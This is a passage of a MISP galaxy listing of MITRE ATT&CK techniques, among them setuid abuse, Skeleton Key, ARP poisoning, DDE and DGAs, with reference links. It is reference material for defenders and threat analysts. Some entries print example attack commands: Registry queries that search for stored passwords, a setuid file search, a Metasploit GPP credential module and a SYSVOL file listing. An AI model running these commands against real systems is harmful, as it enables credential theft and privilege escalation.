The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Modification - T1484.001"

Table 5718. Table References

Links

http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/

http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/

https://adsecurity.org/?p=2716

https://attack.mitre.org/techniques/T1484/001

https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/

https://wald0.com/?p=179

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf

https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/

Process Argument Spoofing - T1564.010

Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)

Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) <code>WriteProcessMemory()</code> function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)

Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)

This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.

The tag is: misp-galaxy:mitre-attack-pattern="Process Argument Spoofing - T1564.010"

Table 5719. Table References

Links

https://attack.mitre.org/techniques/T1564/010

https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/

https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/

https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/

https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode

Setuid and Setgid - T1548.001

An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.

Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.

Adversaries can use this mechanism on their own malware to make sure they’re able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.

Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file’s attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)

The tag is: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1548.001"

Table 5720. Table References

Links

http://man7.org/linux/man-pages/man2/setuid.2.html

https://attack.mitre.org/techniques/T1548/001

https://gtfobins.github.io/+suid

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Direct Network Flood - T1498.001

Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service’s network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.

Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Direct Network Flood - T1498.001"

Table 5721. Table References

Links

https://attack.mitre.org/techniques/T1498/001

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged

OS Exhaustion Flood - T1499.001

Adversaries may launch a denial of service (DoS) attack targeting an endpoint’s operating system (OS). A system’s OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.

Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)

ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)

The tag is: misp-galaxy:mitre-attack-pattern="OS Exhaustion Flood - T1499.001"

Table 5722. Table References

Links

https://attack.mitre.org/techniques/T1499/001

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/

https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html

Domain Controller Authentication - T1556.001

Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.

Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Controller Authentication - T1556.001"

Table 5723. Table References

Links

https://attack.mitre.org/techniques/T1556/001

https://technet.microsoft.com/en-us/library/dn487457.aspx

https://www.secureworks.com/research/skeleton-key-malware-analysis

Stored Data Manipulation - T1565.001

Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001"

Table 5724. Table References

Links

https://attack.mitre.org/techniques/T1565/001

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Social Media Accounts - T1585.001

Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001"

Table 5725. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1585/001

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Scanning IP Blocks - T1595.001

Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Scanning IP Blocks - T1595.001"

Table 5726. Table References

Links

https://attack.mitre.org/techniques/T1595/001

https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf

Component Object Model - T1559.001

Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)

Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001"

Table 5727. Table References

Links

https://attack.mitre.org/techniques/T1559/001

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Social Media Accounts - T1586.001

Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1586.001"

Table 5728. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1586/001

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Fast Flux DNS - T1568.001

Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)

The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)

In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.

The tag is: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1568.001"

Table 5729. Table References

Links

https://attack.mitre.org/techniques/T1568/001

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref

https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/

Threat Intel Vendors - T1597.001

Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)

Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Threat Intel Vendors - T1597.001"

Table 5730. Table References

Links

https://attack.mitre.org/techniques/T1597/001

https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/

Credentials in Registry - T1552.002

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)

  • Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>

  • Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>

The tag is: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002"

Table 5731. Table References

Links

https://attack.mitre.org/techniques/T1552/002

https://pentestlab.blog/2017/04/19/stored-credentials/

Domain Trust Modification - T1484.002

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Trust Modification - T1484.002"

Table 5732. Table References

Links

https://attack.mitre.org/techniques/T1484/002

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed

https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml

https://o365blog.com/post/federation-vulnerability/

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://www.sygnia.co/golden-saml-advisory

Service Exhaustion Flood - T1499.002

Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.

One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)

Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Service Exhaustion Flood - T1499.002"

Table 5733. Table References

Links

https://attack.mitre.org/techniques/T1499/002

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/

https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new

Password Filter DLL - T1556.002

Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.(Citation: Carnal Ownage Password Filters Sept 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002"

Table 5734. Table References

Links

http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html

https://attack.mitre.org/techniques/T1556/002

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

Transmitted Data Manipulation - T1565.002

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002"

Table 5735. Table References

Links

https://attack.mitre.org/techniques/T1565/002

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Group Policy Preferences - T1552.006

Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)

These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).(Citation: Microsoft GPP Key)

The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

  • Metasploit’s post exploitation module: <code>post/windows/gather/credentials/gpp</code>

  • Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)

  • gpprefdecrypt.py

On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: <code>dir /s * .xml</code>

The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006"

Table 5736. Table References

Links

https://adsecurity.org/?p=2288

https://attack.mitre.org/techniques/T1552/006

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)

https://msdn.microsoft.com/library/cc422924.aspx

https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html

ARP Cache Poisoning - T1557.002

Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).

The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.

An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.

The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)

Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)

The tag is: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002"

Table 5737. Table References

Links

https://attack.mitre.org/techniques/T1557/002

https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411

https://tools.ietf.org/html/rfc826

https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf

Dynamic Data Exchange - T1559.002

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)

Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )

DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002"

Table 5738. Table References

Links

https://attack.mitre.org/techniques/T1559/002

https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

https://blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/

https://owasp.org/www-community/attacks/CSV_Injection

https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021

https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee

https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

https://technet.microsoft.com/library/security/4053440

https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/

https://www.contextis.com/blog/comma-separated-vulnerabilities

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Domain Generation Algorithms - T1568.002

Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)

DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)

Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002"

Table 5739. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

http://csis.pace.edu/ctappert/srd2017/2017PDF/d4.pdf

http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf

https://arxiv.org/pdf/1611.00791.pdf

https://attack.mitre.org/techniques/T1568/002

https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/

https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

Safe Mode Boot - T1562.009

